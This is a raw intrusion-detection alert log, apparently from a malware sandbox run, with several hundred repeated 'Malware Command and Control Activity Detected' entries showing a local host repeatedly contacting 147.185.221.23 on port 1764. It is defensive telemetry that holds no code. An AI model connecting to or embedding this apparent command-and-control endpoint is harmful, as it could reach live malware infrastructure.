                      2024-10-13T19:10:44.484849+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:44.603783+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:44.719550+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:44.845230+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:44.964746+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:45.086522+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:45.203830+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:45.313171+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:45.440514+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:45.563159+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:45.672346+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:45.799329+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:45.907029+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:46.028128+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:46.141170+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:46.250576+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:46.359872+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:46.469357+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:46.594377+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:46.727997+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:46.844282+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:46.956906+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:47.062991+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:47.172509+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:47.281647+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:47.391634+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:47.500451+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:47.610075+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:47.734692+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:47.844171+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:47.953515+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:48.072244+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:48.188604+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:48.375865+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:48.538935+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:48.802398+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:48.926299+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:49.094743+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:49.240105+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:49.313305+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:49.434543+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:49.773687+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:49.891085+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:50.000584+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:50.130808+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:50.250473+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:50.362934+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:50.469279+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:50.578771+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:50.692746+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:50.822813+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:50.942028+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:51.082286+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:51.263764+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:51.562931+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:51.730585+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:51.855271+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:51.971735+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:52.086662+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:52.231068+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:52.344086+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:52.478933+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:52.563077+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:52.672326+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:52.812505+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:52.922225+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:53.034245+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:53.140999+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:53.265597+020028529231Malware Command and Control Activity Detected192.168.2.550002147.185.221.231764TCP
                      2024-10-13T19:10:53.275167+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:53.359829+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:53.469282+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:53.602745+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:53.703659+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:54.875409+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:54.985394+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:55.094352+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:55.204990+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:55.313245+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:55.422868+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:55.531696+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:55.641061+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:55.735640+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:55.846934+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:55.975661+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:56.226836+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:56.530841+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:56.611817+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:56.703640+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:56.985081+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:57.078562+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:57.172865+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:57.266046+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:57.368611+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:57.469906+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:57.563230+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:57.690848+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:57.752587+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:57.859761+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:57.953568+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:58.047221+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:58.141035+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:58.267166+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:58.387247+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:58.485042+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:58.582168+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:58.805690+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:59.089722+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:59.188765+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:59.283071+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:59.389811+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:59.520927+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:59.625699+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:59.722669+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:59.844619+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:59.938355+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:00.047607+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:00.157077+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:00.250861+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:00.344163+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:00.458163+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:00.547275+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:00.641390+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:00.734960+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:00.829977+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:00.922521+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:01.017983+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:01.109853+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:01.204071+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:01.352072+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:01.696756+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:01.904547+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:01.984754+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:02.063183+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:02.141127+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:02.220543+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:02.297600+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:02.375331+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:02.469267+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:02.563472+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:02.641011+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:02.726889+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:02.813000+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:02.891082+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:02.969846+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:03.047375+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:03.178809+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:03.241533+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:03.328526+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:03.406673+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:03.484730+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:03.562951+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:03.651179+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:03.719259+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:03.828599+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:03.934912+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:04.036113+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:04.126282+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:04.467330+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:04.476636+020028529231Malware Command and Control Activity Detected192.168.2.550002147.185.221.231764TCP
                      2024-10-13T19:11:04.629264+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:04.703479+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:04.953915+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:05.031913+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:05.109957+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:05.188191+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:05.289096+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:05.382965+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:05.454253+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:05.532039+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:05.625487+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:05.703864+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:05.796472+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:05.877676+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:05.994046+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:06.078508+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:06.157324+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:06.251106+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:06.329419+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:06.411540+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:06.486429+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:06.562991+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:06.648579+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:06.728603+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:06.842910+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:07.275759+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:07.366278+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:07.464265+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:07.531688+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:07.625417+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:07.703543+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:07.781548+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:07.873080+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:07.954063+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:08.041085+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:08.110057+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:08.134267+020028529231Malware Command and Control Activity Detected192.168.2.550002147.185.221.231764TCP
                      2024-10-13T19:11:08.187919+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:08.266034+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:08.370899+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:08.422216+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:08.500318+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:08.562816+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:08.626756+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:08.703451+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:08.769495+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:08.859764+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:08.923871+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:09.000573+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:09.071349+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:09.143780+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:09.220504+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:09.297393+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:09.363791+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:09.422071+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:09.485766+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:09.562867+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:09.667938+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:09.805118+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:09.968605+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:10.047808+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:10.125204+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:10.206214+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:10.265945+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:10.328833+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:10.407986+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:10.469278+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:10.547342+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:10.625398+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:10.703428+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:10.765898+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:11.038918+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:11.063706+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:11.141619+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:11.245038+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:11.312773+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:11.352613+020028529231Malware Command and Control Activity Detected192.168.2.550002147.185.221.231764TCP
                      2024-10-13T19:11:11.375610+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:11.437805+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:11.501051+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:11.577684+020028529231Malware Command and Control Activity Detected192.168.2.550002147.185.221.231764TCP
                      2024-10-13T19:11:11.579737+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:11.640930+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:11.718992+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:11.797336+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:11.910741+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:11.953559+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:12.031591+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:12.094001+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:12.157104+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:12.223051+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:12.300355+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:12.359751+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:12.422311+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:12.484775+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:12.547495+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:12.623567+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:12.704505+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:12.768184+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:12.848456+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:12.931827+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:13.113164+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:13.182061+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:13.274264+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:13.344200+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:13.437898+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:13.516273+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
